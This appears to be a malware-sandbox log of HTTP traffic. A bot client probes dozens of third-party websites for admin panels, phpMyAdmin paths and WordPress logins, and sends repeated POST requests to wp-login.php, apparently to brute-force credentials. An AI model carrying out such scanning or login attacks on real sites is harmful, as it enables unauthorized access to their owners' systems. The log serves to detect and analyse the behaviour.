Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //pma/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=8aonfjgkl3468gr5hac56tn05nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 154Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=Ij8.GzKOUCSeRteciNZvyEdv9xi61b5fGJ8KzBa4qEc-1703276106-1-AYm7nFYABeaygz+QR8NhbHojTjXUZpm+CbdCJfFcOg3A6iLH1+GSklXf0k+L9KNZVX3GH4SCprgzeGHLYiizQQg=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxJ\|ZYXxJUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcicfl.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1Content-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxK\|ZYXxJUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://saltdelcolom.com/wp-login.phpContent-Length: 144Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=eg5hoe9fiphpkgc7auqitf2hvpUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 132Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //PhpMyAdmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=ucx3pOM_revKRy3PUZhR4fbePLT_VPJMo9ZkSAtigv4-1703276108-1-Aeh4NEzSG5xuquXJ5/AefPhynLJasNhQDx2mqDEHQXlnjftxGCzkXKCwdRHhr2UOQM8Phbk5PjCTVrAlQ0IPNLk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=3HhyYTfsX5YRDp4a9hUDOU4FvGovFzj6TOWrYxb25t8-1703276108-1-AdNu1cZ2HgXUxLwkowJ6g+MlOGl60kpAobuKqwPqrrv1WcvQzi/TgmHjoUtdXxaiwHAYo8HKKkVVakEJ1FI2+V8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=ucx3pOM_revKRy3PUZhR4fbePLT_VPJMo9ZkSAtigv4-1703276108-1-Aeh4NEzSG5xuquXJ5/AefPhynLJasNhQDx2mqDEHQXlnjftxGCzkXKCwdRHhr2UOQM8Phbk5PjCTVrAlQ0IPNLk=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1Content-Length: 159Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxK\|ZYXxKUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=3ma2mp4egmtg531c361dfg1mdhUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 140Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://saltdelcolom.com/wp-login.phpContent-Length: 163Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxL\|ZYXxLUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=ADNj9QYSi5Dd9_9biJU3scpPOMQ34zi3XIX_UVRnrc8-1703276111-1-AZD5vYYoWAzXjD8ewmwnDWnJtqsU9ODogsJ67cqVsY7G5qJyg89RP7+4DptrAd08jYbe9xobLiQyADzcu9wlzQ8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
